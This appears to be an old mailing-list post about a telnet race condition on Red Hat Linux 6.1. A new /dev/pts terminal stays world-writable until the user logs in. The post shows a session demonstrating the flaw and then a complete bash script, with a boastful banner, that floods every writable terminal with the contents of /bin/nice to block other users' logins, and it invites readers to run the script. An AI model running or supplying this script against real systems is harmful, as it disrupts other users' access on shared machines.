>
> I did.  Does it require root access to work?  I checked out a redhat box and saw the following permissions in /dev/pts:
>
> crw--w----   1 dcavanau tty      136,   0 Jan 31 02:12 0
> crw-------   1 lpman    tty      136,   1 Jan 31 14:37 1
> crw--w----   1 alan     tty      136,   2 Jan 31 14:37 2
> crw--w----   1 jb       tty      136,   3 Jan 30 15:36 3
> crw--w----   1 phil     tty      136,   4 Jan 30 16:28 4
> crw--w----   1 phil     tty      136,   5 Jan 28 13:01 5
> crw--w----   1 alan     tty      136,   6 Jan 31 14:37 6
>
> How can /bin/nice be catted there with those permissions?
>
> -lineman

Well, first off, I sorry for responding so late. Since I not any good
expressing myself, you haven't seen the "vulnerability". The thing is,
when a user telnet's to another host, a new tty will immediately be put
in /dev/pts/ , and it will be writable for everyone. After the user
has logged it, it will NOT. So all this programs does is to flood the
tty while
the user is trying to log in - Making it hard for the user to log in.

A example:

First, user "frank" connects to localhost with telnet

[frank@localhost frank]$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.14 on an i686
login:

Then, lets have a look in /dev/pts as user john:

[john@localhost john]$ id
uid=504(john) gid=504(john) groups=504(john)
[john@localhost john]$ cd /dev/pts/
[john@localhost pts]$ ls -la
total 36
drwxr-xr-x   2 root     root            0 Feb  3 20:32 ./
drwxr-xr-x   5 root     root        36864 Feb  3 20:33 ../
crw--w--w-   1 root     root     136,   0 Feb  3 20:40 0
[john@localhost pts]$

After user "frank" _has_ logged in, his terminal will not be writable by
everyone!

[frank@localhost frank]$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.14 on an i686
login: frank
Password:
Last login: Wed Feb  3 20:41:54 from localhost

[frank@localhost frank]$

Then as user "john" we have a look:

[john@localhost pts]$ ls -la
total 36
drwxr-xr-x   2 root     root            0 Feb  3 20:32 ./
drwxr-xr-x   5 root     root        36864 Feb  3 20:33 ../
crw--w----   1 frank   tty      136,   0 Feb  3 20:42 0
[john@localhost pts]$

----

After it  is executed, it to constantly watch in /dev/pts
and when someone tries to log in, using telnet, /bin/nice will be cat'ed
into the terminal. This is only possible with telnet, because
ssh,rsh,rlogin
etc, will not put a terminal in /dev/pts before the user has logged in.

So to answer your question, a user does not have to have uid 0.

Try the stupid script now, and see - first run the script, then try to
log in.

Sincerely yours,

cosa nostra

----------------


#!/bin/bash

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY

#c0sa_n0stra@yahoo.com

clear
echo
echo
echo "This c0w has found a	   (__) "
echo "really nice place and        /oo\\############### "
echo "he wants it all for          \\  /################\\ "
echo "himself!              m000h'  \\/ ################ | "
echo "                                  ################ | "
echo "                                  ################ | "
echo "cOsa_nOstra anno 2000       	################ "
echo "                                   ||         || "
echo "                                  ^ ^        ^ ^ 
"
echo "*this c0w will let n0 other c0w eat his gr4ss*"
echo
echo

while /bin/true ; do
    for i in $TTYDIR/* ; do
        if [ -w $i -a -c $i -a $i != $MYTTY ]; then
            cat $NONSENSE > $i
        fi
    done
done

unset i